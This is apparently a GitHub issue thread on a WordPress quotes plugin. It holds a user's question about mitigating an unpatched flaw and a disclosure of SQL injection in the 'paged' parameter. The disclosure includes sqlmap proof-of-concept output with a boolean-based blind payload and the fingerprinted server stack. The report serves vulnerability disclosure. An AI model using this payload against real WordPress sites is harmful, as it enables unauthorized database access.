ghost
commented
2 years ago I read on the wordpress contributor forum that this project is currently unable to manage this project because of busyness, I am not a proficient programmer, but is there a temporary way so that this vurnerability cannot be utilized? or we have to disable or even delete these plugins until we wait for the code update? thanks.
There is an SQL injection vulnerability at the 'page' parameter POC:
sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:
Parameter: paged (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=quotes-collection&s=&_wpnonce=6451483bd1&action=make_public&paged=1 AND 8236=8236&bulkcheck[]=1
[16:57:38] [INFO] testing MySQL [16:57:38] [INFO] confirming MySQL [16:57:39] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 8 web application technology: Apache 2.4.37, PHP 7.2.24 back-end DBMS: MySQL >= 5.0.2